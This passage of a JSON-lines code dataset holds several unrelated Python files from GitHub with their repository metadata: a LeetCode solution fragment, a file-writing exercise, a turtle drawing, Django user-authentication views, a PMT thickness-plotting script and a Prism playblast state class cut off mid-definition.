4\n \n hor_adj = sum([adjecent(row) for row in grid])\n ver_adj = sum([adjecent(row) for row in zip(*grid)])\n \n return top_down + sides - hor_adj - ver_adj\n \ndef adjecent(row: list[int]) -> int:\n\n total = 0\n\n for i in range(len(row)-1):\n if row[i] and row[i+1]:\n total += min(row[i], row[i+1]) * 2\n return total","repo_name":"IzzeddinTeeti/LeetCodeSolutions","sub_path":"892-surface-area-of-3d-shapes/892-surface-area-of-3d-shapes.py","file_name":"892-surface-area-of-3d-shapes.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31703254619","text":"employees = [\n (\"jack shephard\", \"Sales\", 100000, 1978, True),\n (\"kate austen\", \"IT\", 200000, 1985, False),\n (\"ben linus\", \"Finance\", 150000, 1967, True),\n (\"james sawyer\", \"HR\", 70000, 1979, True),\n (\"kim kwon\", \"Sales\", 120000, 1986, True),\n (\"sun kwon\", \"IT\", 170000, 1984, False),\n (\"hugo reyes\", \"IT\", 120000, 1992, True)\n]\n\ntry:\n myfile = open(\"employees2.txt\", mode=\"w\")\n for full_name, department, salary, birth_year, full_time in employees:\n myfile.write(f\"{full_name},{salary},{birth_year},{department},\"\n f\"{'FULL_TIME' if full_time else 'PART_TIME'}\\n\") # text i/o\n print(\"Employees are saved to the file\")\nexcept FileNotFoundError as err:\n print(err)\nfinally:\n myfile.close()\n","repo_name":"deepcloudlabs/dcl160-2021-jul-05","sub_path":"module07-exceptions.and.files/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9481603090","text":"import turtle\n\n# Define a function to draw a heart\ndef draw_heart(x, y, size):\n turtle.up()\n turtle.goto(x, y)\n turtle.down()\n turtle.begin_fill()\n turtle.color('red')\n turtle.pensize(2)\n turtle.pencolor('black')\n turtle.right(45)\n turtle.forward(size)\n turtle.circle(size/2, 180)\n turtle.left(90)\n turtle.circle(size/2, 180)\n turtle.forward(size)\n turtle.end_fill()\n\n# Set up the turtle window and draw a heart\nturtle.setup(width=500, height=500)\nturtle.speed(0)\ndraw_heart(0, 0, 200)\n\n# Keep the turtle window open until manually closed\nturtle.done()","repo_name":"jingyu323/pythons","sub_path":"test/test_basic_grama/study_exam/draw_heart.py","file_name":"draw_heart.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27957652794","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .models import Profile\nfrom django.contrib import messages\nfrom .forms import ProfileForm\n\n# Create your views here.\ndef profile(request):\n user = Profile.objects.all()\n context ={'user': user}\n return render(request,'user/profiles.html',context)\n\ndef loginUser(request):\n\n page = 'login'\n\n if request.user.is_authenticated:\n return redirect('profile')\n\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n try:\n user = User.objects.get(username=username)\n except:\n messages.error(request,'User not found')\n user = authenticate(request, username=username, password=password)\n\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n messages.error(request,'Username or password is incorrect')\n return render(request,'user/login_register.html',)\n\ndef logoutUser(request):\n logout(request)\n messages.error(request,'Username successfully logout')\n return redirect('login')\n\ndef registerUser(request):\n page = 'register'\n form = UserCreationForm()\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user=form.save(commit=False)\n user.username = user.username.lower()\n user.save()\n\n messages.success(request,'User created successfully')\n login(request,user)\n return redirect('home')\n\n else:\n messages.success(request,'An error occurred')\n context={'page': page, 'form': form}\n return render(request,'user/login_register.html',context)\n\n\n@login_required(login_url='login')\ndef editAccount(request):\n profile = request.user.profile\n form = ProfileForm(instance=profile)\n name = profile.user.username\n print(name)\n\n if request.method == 'POST':\n form = ProfileForm(request.POST, request.FILES, instance=profile)\n if form.is_valid():\n form.save()\n return redirect('profile')\n context ={'form' : form}\n return render(request,'user/profile_form.html',context)","repo_name":"ayushsaxenagithub/candiresume","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27814203256","text":"import csv\nimport numpy as np\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom scipy.optimize import curve_fit\n\n\ndef thickness_plots(pmt_num):\n data_path = Path(r'/Users/Eliza/Documents/WATCHMAN/PMT Testing/thickness_measurements')\n\n base_array = np.empty([7, 12])\n above_array = np.empty([7, 12])\n below_array = np.empty([7, 12])\n extra_array = np.empty([20])\n mean_base_array = np.empty([2, 12])\n mean_above_array = np.empty([2, 12])\n mean_below_array = np.empty([2, 12])\n\n if pmt_num == 3:\n # Reads PMT Data (mm)\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_below.csv'), 'r') # Opens file with 1 cm below data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with 1 cm below data\n if row_num >= 0:\n for i in range(7):\n below_array[i, row_num] = float(row[i])\n row_num += 1\n myfile.close()\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_extra.csv'), 'r') # Opens file with extra point 1 data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with extra point 1 data\n if row_num >= 0:\n extra_array[row_num] = float(row[0])\n row_num += 1\n myfile.close()\n\n # Calculates mean value for each measurement point\n mean_below_array[0, :] = below_array[0, :]\n for i in range(12):\n mean_below_array[1, i] = np.mean(below_array[1:7, i])\n\n error_below = np.std(mean_below_array[1, :]) / np.sqrt(len(mean_below_array[1, :]))\n dispersion_below = error_below / np.mean(mean_below_array[1, :])\n dispersion_below = format(dispersion_below * 100, '.2f')\n\n else:\n # Reads PMT Data (mm)\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_base.csv'), 'r') # Opens file with base of neck data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with base of neck data\n if row_num >= 0:\n for i in range(7):\n base_array[i, row_num] = float(row[i])\n row_num += 1\n myfile.close()\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_above.csv'), 'r') # Opens file with 1 cm above data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with 1 cm above data\n if row_num >= 0:\n for i in range(7):\n above_array[i, row_num] = float(row[i])\n row_num += 1\n myfile.close()\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_below.csv'), 'r') # Opens file with 1 cm below data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with 1 cm below data\n if row_num >= 0:\n for i in range(7):\n below_array[i, row_num] = float(row[i])\n row_num += 1\n myfile.close()\n myfile = open(data_path / str('pmt_' + str(pmt_num) + '_extra.csv'), 'r') # Opens file with extra point 1 data\n csv_reader = csv.reader(myfile)\n row_num = -1\n for row in csv_reader: # Creates array with extra point 1 data\n if row_num >= 0:\n extra_array[row_num] = float(row[0])\n row_num += 1\n myfile.close()\n\n # Calculates mean value for each measurement point\n mean_base_array[0, :] = base_array[0, :]\n for i in range(12):\n mean_base_array[1, i] = np.mean(base_array[1:7, i])\n\n mean_above_array[0, :] = above_array[0, :]\n for i in range(12):\n mean_above_array[1, i] = np.mean(above_array[1:7, i])\n\n mean_below_array[0, :] = below_array[0, :]\n for i in range(12):\n mean_below_array[1, i] = np.mean(below_array[1:7, i])\n\n error_base = np.std(mean_base_array[1, :]) / np.sqrt(len(mean_base_array[1, :]))\n dispersion_base = error_base / np.mean(mean_base_array[1, :])\n dispersion_base = format(dispersion_base * 100, '.2f')\n\n error_above = np.std(mean_above_array[1, :]) / np.sqrt(len(mean_above_array[1, :]))\n dispersion_above = error_above / np.mean(mean_above_array[1, :])\n dispersion_above = format(dispersion_above * 100, '.2f')\n\n error_below = np.std(mean_below_array[1, :]) / np.sqrt(len(mean_below_array[1, :]))\n dispersion_below = error_below / np.mean(mean_below_array[1, :])\n dispersion_below = format(dispersion_below * 100, '.2f')\n\n # Creates plots\n def func(m, a, b, c): # Defines Gaussian function (a is amplitude, b is mean, c is standard deviation)\n return a * np.exp(-(m - b) ** 2.0 / (2 * c ** 2))\n\n n, bins, patches = plt.hist(extra_array, 7) # Plots histogram\n b_est, c_est = norm.fit(extra_array) # Calculates mean & standard deviation based on entire array\n bins = np.delete(bins, len(bins) - 1)\n bins_diff = bins[1] - bins[0]\n bins = np.linspace(bins[0] + bins_diff / 2, bins[len(bins) - 1] + bins_diff / 2, len(bins))\n bins_range = np.linspace(bins[0], bins[len(bins) - 1], 10000) # Creates array of bins\n n_range = np.interp(bins_range, bins, n) # Interpolates & creates array of y axis values\n guess = [1, float(b_est), float(c_est)] # Defines guess for values of a, b & c in Gaussian fit\n popt, pcov = curve_fit(func, bins_range, n_range, p0=guess, maxfev=5000) # Finds Gaussian fit\n mu = float(format(popt[1], '.2e')) # Calculates mean\n sd = np.abs(float(format(popt[2], '.2e'))) # Calculates standard deviation\n plt.plot(bins_range, func(bins_range, *popt)) # Plots Gaussian fit\n sum_val = 0\n num = 0\n for item in extra_array:\n sum_val += (item - mu)**2\n num += 1\n sigma = np.sqrt(sum_val / num)\n sigma = float(format(sigma, '.2e'))\n plt.xlabel('Thickness (mm)')\n plt.title('PMT ' + str(pmt_num) + ' Thickness at Point 1\\n mean: ' + str(mu) + ' mm' + ', SD: ' + str(sd) + ' mm' +\n ', sigma: ' + str(sigma) + ' mm')\n plt.savefig(Path(r'/Users/Eliza/Documents/WATCHMAN/PMT Testing/thickness_plots/pmt_' + str(pmt_num) +\n '_point_1.png'), dpi=360)\n plt.close()\n\n if pmt_num == 1:\n x_pt = 200\n y_pt = 4.3\n elif pmt_num == 2:\n x_pt = 25\n y_pt = 3\n else:\n x_pt = 200\n y_pt = 3.4\n\n if pmt_num == 3:\n plt.plot(mean_below_array[0, :], mean_below_array[1, :], 'green')\n plt.errorbar(mean_below_array[0, :], mean_below_array[1, :], sigma)\n plt.xlabel('Azimuthal Angle (degrees)')\n plt.ylabel('Thickness (mm)')\n plt.title('PMT ' + str(pmt_num) + ' Thickness (1 cm Below Base of Neck)')\n plt.text(x_pt, y_pt, str('Dispersion:\\n1 cm Below - ' + str(dispersion_below) + '%'), verticalalignment='top',\n bbox=dict(alpha=0.5, facecolor='none'))\n plt.savefig(Path(r'/Users/Eliza/Documents/WATCHMAN/PMT Testing/thickness_plots/pmt_' + str(pmt_num) +\n '_thicknesses.png'), dpi=360)\n plt.close()\n else:\n x, = plt.plot(mean_base_array[0, :], mean_base_array[1, :], 'blue')\n plt.errorbar(mean_base_array[0, :], mean_base_array[1, :], sigma)\n y, = plt.plot(mean_above_array[0, :], mean_above_array[1, :], 'orange')\n plt.errorbar(mean_above_array[0, :], mean_above_array[1, :], sigma)\n z, = plt.plot(mean_below_array[0, :], mean_below_array[1, :], 'green')\n plt.errorbar(mean_below_array[0, :], mean_below_array[1, :], sigma)\n plt.legend((x, y, z), ('Base of Neck', '1 cm Above Base of Neck', '1 cm Below Base of Neck'))\n plt.xlabel('Azimuthal Angle (degrees)')\n plt.ylabel('Thickness (mm)')\n plt.title('PMT ' + str(pmt_num) + ' Thicknesses')\n plt.text(x_pt, y_pt, str('Dispersion:\\nBase - ' + str(dispersion_base) + '%\\n1 cm Above - ' +\n str(dispersion_above) + '%\\n1 cm Below - ' + str(dispersion_below) + '%'),\n verticalalignment='top', bbox=dict(alpha=0.5, facecolor='none'))\n plt.savefig(Path(r'/Users/Eliza/Documents/WATCHMAN/PMT Testing/thickness_plots/pmt_' + str(pmt_num) +\n '_thicknesses.png'), dpi=360)\n plt.close()\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(prog=\"thickness_plots\", description=\"Creates plots of PMT thickness measurements\")\n parser.add_argument(\"--pmt_num\", type=int, help='number of PMT (default=1)', default=1)\n args = parser.parse_args()\n\n thickness_plots(args.pmt_num)\n","repo_name":"eneights/pmt_tests","sub_path":"pmt_thickness_measurement.py","file_name":"pmt_thickness_measurement.py","file_ext":"py","file_size_in_byte":9130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12231619680","text":"import os\nimport sys\nimport time\nimport traceback\nimport platform\nimport logging\n\ntry:\n from PySide2.QtCore import *\n from PySide2.QtGui import *\n from PySide2.QtWidgets import *\n\n psVersion = 2\nexcept:\n from PySide.QtCore import *\n from PySide.QtGui import *\n\n psVersion = 1\n\nif sys.version[0] == \"3\":\n pVersion = 3\nelse:\n pVersion = 2\n\nfrom PrismUtils.Decorators import err_catcher\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass PlayblastClass(object):\n className = \"Playblast\"\n listType = \"Export\"\n\n @err_catcher(name=__name__)\n def setup(self, state, core, stateManager, stateData=None):\n self.state = state\n self.core = core\n self.stateManager = stateManager\n\n self.curCam = None\n self.e_name.setText(state.text(0))\n\n self.l_name.setVisible(False)\n self.e_name.setVisible(False)\n\n self.camlist = []\n\n self.rangeTypes = [\"State Manager\", \"Scene\", \"Shot\", \"Single Frame\", \"Custom\"]\n self.cb_rangeType.addItems(self.rangeTypes)\n for idx, rtype in enumerate(self.rangeTypes):\n self.cb_rangeType.setItemData(idx, self.stateManager.getFrameRangeTypeToolTip(rtype), Qt.ToolTipRole)\n\n dftResPresets = [\n \"3840x2160\",\n \"1920x1080\",\n \"1280x720\",\n \"960x540\",\n \"640x360\",\n \"Get from rendersettings\",\n ]\n\n self.resolutionPresets = self.core.getConfig(\"globals\", \"resolutionPresets\", configPath=self.core.prismIni, dft=dftResPresets)\n\n if \"Get from rendersettings\" not in self.resolutionPresets:\n self.resolutionPresets.append(\"Get from rendersettings\")\n\n self.outputformats = [\".jpg\", \".mp4\"]\n self.cb_formats.addItems(self.outputformats)\n getattr(self.core.appPlugin, \"sm_playblast_startup\", lambda x: None)(self)\n self.connectEvents()\n\n self.oldPalette = self.b_changeTask.palette()\n self.warnPalette = QPalette()\n self.warnPalette.setColor(QPalette.Button, QColor(200, 0, 0))\n self.warnPalette.setColor(QPalette.ButtonText, QColor(255, 255, 255))\n\n self.setTaskWarn(True)\n\n self.f_localOutput.setVisible(self.core.useLocalFiles)\n\n self.updateUi()\n if stateData is not None:\n self.loadData(stateData)\n else:\n fileName = self.core.getCurrentFileName()\n fnameData = self.core.getScenefileData(fileName)\n if fnameData.get(\"category\"):\n self.l_taskName.setText(fnameData.get(\"category\"))\n\n @err_catcher(name=__name__)\n def loadData(self, data):\n if \"statename\" in data:\n self.e_name.setText(data[\"statename\"])\n if \"taskname\" in data:\n self.l_taskName.setText(data[\"taskname\"])\n if data[\"taskname\"] != \"\":\n self.setTaskWarn(False)\n self.nameChanged(self.e_name.text())\n if \"rangeType\" in data:\n idx = self.cb_rangeType.findText(data[\"rangeType\"])\n if idx != -1:\n self.cb_rangeType.setCurrentIndex(idx)\n self.updateRange()\n if \"startframe\" in data:\n self.sp_rangeStart.setValue(int(data[\"startframe\"]))\n if \"endframe\" in data:\n self.sp_rangeEnd.setValue(int(data[\"endframe\"]))\n if \"currentcam\" in data:\n camName = getattr(self.core.appPlugin, \"getCamName\", lambda x, y: \"\")(\n self, data[\"currentcam\"]\n )\n idx = self.cb_cams.findText(camName)\n if idx > 0:\n self.curCam = self.camlist[idx - 1]\n self.cb_cams.setCurrentIndex(idx)\n self.stateManager.saveStatesToScene()\n if \"resoverride\" in data:\n res = eval(data[\"resoverride\"])\n self.chb_resOverride.setChecked(res[0])\n self.sp_resWidth.setValue(res[1])\n self.sp_resHeight.setValue(res[2])\n if \"localoutput\" in data:\n self.chb_localOutput.setChecked(eval(data[\"localoutput\"]))\n if \"outputformat\" in data:\n idx = self.cb_formats.findText(data[\"outputformat\"])\n if idx > 0:\n self.cb_formats.setCurrentIndex(idx)\n if \"lastexportpath\" in data:\n lePath = self.core.fixPath(data[\"lastexportpath\"])\n self.l_pathLast.setText(lePath)\n self.l_pathLast.setToolTip(lePath)\n pathIsNone = self.l_pathLast.text() == \"None\"\n self.b_openLast.setEnabled(not pathIsNone)\n self.b_copyLast.setEnabled(not pathIsNone)\n if \"stateenabled\" in data:\n self.state.setCheckState(\n 0,\n eval(\n data[\"stateenabled\"]\n .replace(\"PySide.QtCore.\", \"\")\n .replace(\"PySide2.QtCore.\", \"\")\n ),\n )\n\n getattr(self.core.appPlugin, \"sm_playblast_loadData\", lambda x, y: None)(\n self, data\n )\n\n @err_catcher(name=__name__)\n def connectEvents(self):\n self.e_name.textChanged.connect(self.nameChanged)\n self.e_name.editingFinished.connect(self.stateManager.saveStatesToScene)\n self.b_changeTask.clicked.connect(self.changeTask)\n self.cb_rangeType.activated.connect(self.rangeTypeChanged)\n self.sp_rangeStart.editingFinished.connect(self.startChanged)\n self.sp_rangeEnd.editingFinished.connect(self.endChanged)\n self.cb_cams.activated.connect(self.setCam)\n self.chb_resOverride.stateChanged.connect(self.resOverrideChanged)\n self.sp_resWidth.editingFinished.connect(self.stateManager.saveStatesToScene)\n self.sp_resHeight.editingFinished.connect(self.stateManager.saveStatesToScene)\n self.b_resPresets.clicked.connect(self.showResPresets)\n self.chb_localOutput.stateChanged.connect(self.stateManager.saveStatesToScene)\n self.cb_formats.activated.connect(self.stateManager.saveStatesToScene)\n self.b_openLast.clicked.connect(\n lambda: self.core.openFolder(os.path.dirname(self.l_pathLast.text()))\n )\n self.b_copyLast.clicked.connect(\n lambda: self.core.copyToClipboard(self.l_pathLast.text())\n )\n\n @err_catcher(name=__name__)\n def rangeTypeChanged(self, state):\n self.updateRange()\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def startChanged(self):\n if self.sp_rangeStart.value() > self.sp_rangeEnd.value():\n self.sp_rangeEnd.setValue(self.sp_rangeStart.value())\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def endChanged(self):\n if self.sp_rangeEnd.value() < self.sp_rangeStart.value():\n self.sp_rangeStart.setValue(self.sp_rangeEnd.value())\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def setCam(self, index):\n if index == 0:\n self.curCam = None\n else:\n self.curCam = self.camlist[index - 1]\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def nameChanged(self, text):\n taskname = self.l_taskName.text()\n if taskname == \"\":\n taskname = \"None\"\n\n sText = text + \" (%s)\" % taskname\n if self.state.text(0).endswith(\" - disabled\"):\n sText += \" - disabled\"\n\n self.state.setText(0, sText)\n\n @err_catcher(name=__name__)\n def setTaskname(self, taskname):\n self.l_taskName.setText(taskname)\n self.updateUi()\n\n @err_catcher(name=__name__)\n def changeTask(self):\n import CreateItem\n\n self.nameWin = CreateItem.CreateItem(\n startText=self.l_taskName.text(),\n showTasks=True,\n taskType=\"playblast\",\n core=self.core,\n )\n self.core.parentWindow(self.nameWin)\n self.nameWin.setWindowTitle(\"Change Taskname\")\n self.nameWin.l_item.setText(\"Taskname:\")\n self.nameWin.buttonBox.buttons()[0].setText(\"Ok\")\n self.nameWin.e_item.selectAll()\n result = self.nameWin.exec_()\n\n if result == 1:\n self.l_taskName.setText(self.nameWin.e_item.text())\n self.nameChanged(self.e_name.text())\n\n self.setTaskWarn(False)\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def resOverrideChanged(self, checked):\n self.sp_resWidth.setEnabled(checked)\n self.sp_resHeight.setEnabled(checked)\n self.b_resPresets.setEnabled(checked)\n\n self.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def showResPresets(self):\n pmenu = QMenu(self.stateManager)\n\n for preset in self.resolutionPresets:\n pAct = QAction(preset, self)\n res = self.getResolution(preset)\n if not res:\n continue\n\n pwidth, pheight = res\n\n pAct.triggered.connect(\n lambda x=None, v=pwidth: self.sp_resWidth.setValue(v)\n )\n pAct.triggered.connect(\n lambda x=None, v=pheight: self.sp_resHeight.setValue(v)\n )\n pAct.triggered.connect(lambda: self.stateManager.saveStatesToScene())\n pmenu.addAction(pAct)\n\n pmenu.exec_(QCursor.pos())\n\n @err_catcher(name=__name__)\n def getResolution(self, resolution):\n res = None\n if resolution == \"Get from rendersettings\":\n res = self.core.appPlugin.getResolution()\n else:\n try:\n pwidth = int(resolution.split(\"x\")[0])\n pheight = int(resolution.split(\"x\")[1])\n res = [pwidth, pheight]\n except:\n res = getattr(self.core.appPlugin, \"evaluateResolution\", lambda x: None)(resolution)\n\n return res\n\n @err_catcher(name=__name__)\n def updateUi(self):\n # update Cams\n self.cb_cams.clear()\n self.cb_cams.addItem(\"Don't override\")\n self.camlist = camNames = []\n\n if not self.stateManager.standalone:\n self.camlist = self.core.appPlugin.getCamNodes(self)\n camNames = [self.core.appPlugin.getCamName(self, i) for i in self.camlist]\n\n self.cb_cams.addItems(camNames)\n\n if self.curCam in self.camlist:\n self.cb_cams.setCurrentIndex(self.camlist.index(self.curCam) + 1)\n else:\n self.cb_cams.setCurrentIndex(0)\n self.curCam = None\n\n self.updateRange()\n\n if self.l_taskName.text() != \"\":\n self.setTaskWarn(False)\n\n self.nameChanged(self.e_name.text())\n\n return True\n\n @err_catcher(name=__name__)\n def updateRange(self):\n rangeType = self.cb_rangeType.currentText()\n isCustom = rangeType == \"Custom\"\n self.l_rangeStart.setVisible(not isCustom)\n self.l_rangeEnd.setVisible(not isCustom)\n self.sp_rangeStart.setVisible(isCustom)\n self.sp_rangeEnd.setVisible(isCustom)\n\n if not isCustom:\n frange = self.getFrameRange(rangeType=rangeType)\n start = str(int(frange[0])) if frange[0] is not None else \"-\"\n end = str(int(frange[1])) if frange[1] is not None else \"-\"\n self.l_rangeStart.setText(start)\n self.l_rangeEnd.setText(end)\n\n @err_catcher(name=__name__)\n def getFrameRange(self, rangeType):\n startFrame = None\n endFrame = None\n if rangeType == \"State Manager\":\n startFrame = self.stateManager.sp_rangeStart.value()\n endFrame = self.stateManager.sp_rangeEnd.value()\n elif rangeType == \"Scene\":\n startFrame, endFrame = self.core.appPlugin.getFrameRange(self)\n elif rangeType == \"Shot\":\n fileName = self.core.getCurrentFileName()\n fnameData = self.core.getScenefileData(fileName)\n if fnameData[\"entity\"] == \"shot\":\n frange = self.core.entities.getShotRange(fnameData[\"entityName\"])\n if frange:\n startFrame, endFrame = frange\n elif rangeType == \"Single Frame\":\n startFrame = self.core.appPlugin.getCurrentFrame()\n elif rangeType == \"Custom\":\n startFrame = self.sp_rangeStart.value()\n endFrame = self.sp_rangeEnd.value()\n\n if startFrame is not None:\n startFrame = int(startFrame)\n\n if endFrame is not None:\n endFrame = int(endFrame)\n\n return startFrame, endFrame\n\n @err_catcher(name=__name__)\n def updateLastPath(self, path):\n self.l_pathLast.setText(path)\n self.l_pathLast.setToolTip(path)\n self.b_openLast.setEnabled(True)\n self.b_copyLast.setEnabled(True)\n\n @err_catcher(name=__name__)\n def preExecuteState(self):\n warnings = []\n\n if self.l_taskName.text() == \"\":\n warnings.append([\"No taskname is given.\", \"\", 3])\n\n rangeType = self.cb_rangeType.currentText()\n startFrame, endFrame = self.getFrameRange(rangeType)\n\n if startFrame is None:\n warnings.append([\"Framerange is invalid.\", \"\", 3])\n\n warnings += self.core.appPlugin.sm_playblast_preExecute(self)\n\n return [self.state.text(0), warnings]\n\n @err_catcher(name=__name__)\n def getOutputName(self, useVersion=\"next\", extension=None):\n if self.l_taskName.text() == \"\":\n return\n\n task = self.l_taskName.text()\n extension = extension or self.cb_formats.currentText()\n fileName = self.core.getCurrentFileName()\n fnameData = self.core.getScenefileData(fileName)\n framePadding = \".\" if self.cb_rangeType.currentText() != \"Single Frame\" else \"\"\n\n if \"entityName\" not in fnameData:\n return\n\n location = \"global\"\n if (\n self.core.useLocalFiles\n and self.chb_localOutput.isChecked()\n ):\n location = \"local\"\n\n if fnameData[\"entity\"] == \"asset\":\n assetPath = self.core.getEntityBasePath(fileName)\n entityName = self.core.entities.getAssetRelPathFromPath(assetPath)\n else:\n entityName = fnameData[\"entityName\"]\n\n outputPath = self.core.mediaProducts.generatePlayblastPath(\n entity=fnameData[\"entity\"],\n entityName=entityName,\n task=task,\n extension=extension,\n framePadding=framePadding,\n comment=fnameData[\"comment\"],\n version=useVersion if useVersion != \"next\" else None,\n location=location\n )\n\n outputPath = outputPath.replace(\"\\\\\", \"/\")\n outputFolder = os.path.dirname(outputPath)\n hVersion = self.core.mediaProducts.getVersionFromPlayblastFilepath(outputPath)\n\n return outputPath, outputFolder, hVersion\n\n @err_catcher(name=__name__)\n def executeState(self, parent, useVersion=\"next\"):\n # \tif not self.core.uiAvailable:\n # \t\treturn [self.state.text(0) + \": error - Playblasts are not supported without UI.\"]\n\n if self.l_taskName.text() == \"\":\n return [\n self.state.text(0)\n + \": error - No taskname is given. Skipped the activation of this state.\"\n ]\n\n fileName = self.core.getCurrentFileName()\n\n result = self.getOutputName(useVersion=useVersion, extension=\".jpg\")\n if not result:\n return [\n self.state.text(0)\n + \": error - Couldn't generate an outputpath for this state.\\nMake sure your scenefile is saved correctly in the pipeline.\"\n ]\n return\n\n outputName, outputPath, hVersion = result\n\n outLength = len(outputName)\n if platform.system() == \"Windows\" and outLength > 255:\n return [\n self.state.text(0)\n + \" - error - The outputpath is longer than 255 characters (%s), which is not supported on Windows. Please shorten the outputpath by changing the comment, taskname or projectpath.\"\n % outLength\n ]\n\n rangeType = self.cb_rangeType.currentText()\n startFrame, endFrame = self.getFrameRange(rangeType)\n if startFrame is None:\n return [self.state.text(0) + \": error - Framerange is invalid\"]\n\n if rangeType == \"Single Frame\":\n endFrame = startFrame\n\n jobFrames = [startFrame, endFrame]\n\n exCheck = self.core.appPlugin.sm_playblast_execute(self)\n if exCheck is not None:\n return exCheck\n\n if self.curCam is not None and not self.core.appPlugin.isNodeValid(\n self, self.curCam\n ):\n return [\n self.state.text(0) + \": error - Camera is invalid (%s).\" % self.curCam\n ]\n\n kwargs = {\n \"state\": self,\n \"scenefile\": fileName,\n \"startframe\": jobFrames[0],\n \"endframe\": jobFrames[1],\n \"outputpath\": outputName,\n }\n result = self.core.callback(\"prePlayblast\", **kwargs)\n\n for res in result:\n if res and \"outputName\" in res:\n outputName = res[\"outputName\"]\n\n outputPath = os.path.dirname(outputName)\n if not os.path.exists(outputPath):\n os.makedirs(outputPath)\n\n self.core.saveVersionInfo(\n location=outputPath, version=hVersion, origin=fileName\n )\n\n self.updateLastPath(outputName)\n self.stateManager.saveStatesToScene()\n\n self.core.saveScene(versionUp=False, prismReq=False)\n\n try:\n self.core.appPlugin.sm_playblast_createPlayblast(\n self, jobFrames=jobFrames, outputName=outputName\n )\n\n getattr(self.core.appPlugin, \"sm_playblast_postExecute\", lambda x: None)(\n self\n )\n\n if self.cb_formats.currentText() == \".mp4\":\n mediaBaseName = os.path.splitext(outputName)[0]\n videoOutput = mediaBaseName + \"mp4\"\n inputpath = (\n os.path.splitext(outputName)[0]\n + \"%04d\".replace(\"4\", str(self.core.framePadding))\n + os.path.splitext(outputName)[1]\n )\n result = self.core.media.convertMedia(inputpath, jobFrames[0], videoOutput)\n\n if not os.path.exists(videoOutput):\n logger.warning(\"fmmpeg output: %s\" % str(result))\n return [\n self.state.text(0)\n + \" - error occurred during conversion of jpg files to mp4. Check the console for more information.\"\n ]\n\n delFiles = []\n for i in os.listdir(outputPath):\n if i.startswith(os.path.basename(mediaBaseName)) and i.endswith(\n \".jpg\"\n ):\n delFiles.append(os.path.join(outputPath, i))\n\n for i in delFiles:\n try:\n os.remove(i)\n except:\n pass\n\n self.updateLastPath(videoOutput)\n\n kwargs = {\n \"state\": self,\n \"scenefile\": fileName,\n \"startframe\": jobFrames[0],\n \"endframe\": jobFrames[1],\n \"outputpath\": outputName,\n }\n result = self.core.callback(\"postPlayblast\", **kwargs)\n\n for res in result:\n if res and \"outputName\" in res:\n outputPath = os.path.dirname(res[\"outputName\"])\n\n if len(os.listdir(outputPath)) > 1:\n return [self.state.text(0) + \" - success\"]\n else:\n return [self.state.text(0) + \" - unknown error (files do not exist)\"]\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n erStr = \"%s ERROR - sm_default_playblast %s:\\n%s\" % (\n time.strftime(\"%d/%m/%y %X\"),\n self.core.version,\n traceback.format_exc(),\n )\n self.core.writeErrorLog(erStr)\n return [\n self.state.text(0)\n + \" - unknown error (view console for more information)\"\n ]\n\n @err_catcher(name=__name__)\n def setTaskWarn(self, warn):\n useSS = getattr(self.core.appPlugin, \"colorButtonWithStyleSheet\", False)\n if warn:\n if useSS:\n self.b_changeTask.setStyleSheet(\n \"QPushButton { background-color: rgb(200,0,0); }\"\n )\n else:\n self.b_changeTask.setPalette(self.warnPalette)\n else:\n if useSS:\n self.b_changeTask.setStyleSheet(\"\")\n else:\n self.b_changeTask.setPalette(self.oldPalette)\n\n @err_catcher(name=__name__)\n def getStateProps(self):\n stateProps = {}\n stateProps.update(\n getattr(self.core.appPlugin, \"sm_playblast_getStateProps\", lambda x: {})(\n self\n )\n )\n stateProps.update(\n {\n \"statename\": self.e_name.text(),\n \"taskname\": self.l_taskName.text(),\n \"rangeType\": str(self.cb_rangeType.currentText()),\n \"startframe\": self.sp_rangeStart.value(),\n \"endframe\": self.sp_rangeEnd.value(),\n \"currentcam\": str(self.curCam),\n \"resoverride\": str(\n [\n self.chb_resOverride.isChecked(),\n self.sp_resWidth.value(),\n self.sp_resHeight.value(),\n ]\n ),\n \"localoutput\": str(self.chb_localOutput.isChecked()),\n \"lastexportpath\": 